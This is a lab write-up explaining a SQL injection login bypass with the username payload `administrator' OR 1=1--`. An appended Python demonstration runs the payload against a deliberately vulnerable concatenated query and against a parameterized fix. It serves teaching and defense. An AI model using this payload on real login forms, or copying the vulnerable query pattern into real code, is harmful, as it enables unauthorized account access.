We used the following payload in the Username tab:

administrator' OR 1=1--

And we were able to solve the lab.

This is what the MySQL query might look like on the backend after the payload is injected:

SELECT * FROM users WHERE username = 'administrator' OR 1=1--' AND password = 'somepassword'
  • With the injected username, the condition becomes username = 'administrator' OR 1=1, so the WHERE clause always evaluates to true because of the 1=1 condition.
  • The rest of the query after the double hyphen -- is commented out, which prevents any syntax errors that the injected payload would otherwise cause.
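
The query above with its fix beside it, as an added example that is not part of the original write-up. SQLite (Python's sqlite3) stands in for MySQL so it runs offline; the table layout, sample rows and function names are assumptions.

```python
import sqlite3

PAYLOAD = "administrator' OR 1=1--"  # username value from the write-up


def make_db():
    # Constructed sample data; table layout assumed from the query above.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("administrator", "s3cret-admin"), ("alice", "alice-pw")],
    )
    return db


def login_vulnerable(db, username, password):
    # String concatenation: the input becomes part of the SQL text,
    # so a quote in the username ends the string literal early.
    sql = (
        "SELECT * FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return sql, db.execute(sql).fetchall()


def login_parameterized(db, username, password):
    # Placeholders: the driver binds the input as data, never as SQL,
    # so the quote and the -- are compared literally against the column.
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    sql, rows = login_vulnerable(db, PAYLOAD, "somepassword")
    print(sql)                      # same text as the query shown above
    print("vulnerable   :", rows)   # every row matches
    print("parameterized:", login_parameterized(db, PAYLOAD, "somepassword"))
```
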